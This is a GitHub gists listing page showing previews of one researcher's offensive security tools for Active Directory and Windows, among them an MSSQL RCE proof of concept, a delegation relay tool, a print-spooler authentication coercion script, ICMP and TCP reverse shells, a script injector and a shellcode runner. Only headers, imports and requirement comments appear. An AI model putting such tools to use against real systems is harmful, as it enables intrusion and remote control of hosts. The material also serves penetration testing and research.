
Matt Bush 3xocyte

  • The Missing Link
  • Melbourne, Australia
@3xocyte
3xocyte / adidns_records.py
Last active Nov 12, 2019
get /etc/hosts entries from ADIDNS
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
@3xocyte
3xocyte / bad_sequel.py
Last active Mar 6, 2020
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@3xocyte
3xocyte / rbcd_relay.py
Last active Jun 30, 2020
poc resource-based constrained delegation relay attack tool
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC
import SimpleHTTPServer
import SocketServer
import base64
import random
import struct
@3xocyte
3xocyte / resolve_domain_computers.py
Last active Oct 15, 2019
get /etc/hosts entries for computers in Active Directory
#!/usr/bin/env python
# resolve domain computers by @3xocyte
import argparse
import sys
import string
# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
@3xocyte
3xocyte / create_machine_account.py
Last active Nov 22, 2019
simple script for experimenting with machine account creation
#!/usr/bin/env python
import argparse
import sys
import string
import random
# https://support.microsoft.com/en-au/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain
# create machine account utility by @3xocyte
# with thanks to Kevin Robertson for https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
@3xocyte
3xocyte / dementor.py
Last active Jun 16, 2020
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@3xocyte
3xocyte / scriptinjector.cs
Last active Oct 6, 2018
a small buggy utility inspired by chapter 10 of Black Hat Python by Justin Seitz
using System;
using System.IO;
using System.Text;
using System.Linq;
using System.Collections.Generic;
// ephemeral script injector by @3xocyte
// takes a target directory to watch, and an OS command to attempt to inject into any scripts that get modified
namespace FileContentInjector
@3xocyte
3xocyte / icmpshell.cs
Created Aug 13, 2018
ICMP reverse shell (icmpsh compatible)
using System;
using System.IO;
using System.Text;
using System.Net.NetworkInformation;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Threading;
using System.Collections.ObjectModel;
// .NET ICMP reverse shell client with PowerShell runspace by @3xocyte
@3xocyte
3xocyte / tcpshell.cs
Last active Aug 13, 2018
Reverse TCP shell with PS runspace
using System;
using System.Text;
using System.Net.Sockets;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Collections.ObjectModel;
using System.Diagnostics;
// reverse TCP shell with powershell runspace
// by @3xocyte
@3xocyte
3xocyte / sc-cdb.py
Last active Sep 3, 2019
shellcode to cdb.exe
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
src = open('shellcode', 'r')
sc = src.read()
src.close()
copy = ";eb @$t0+"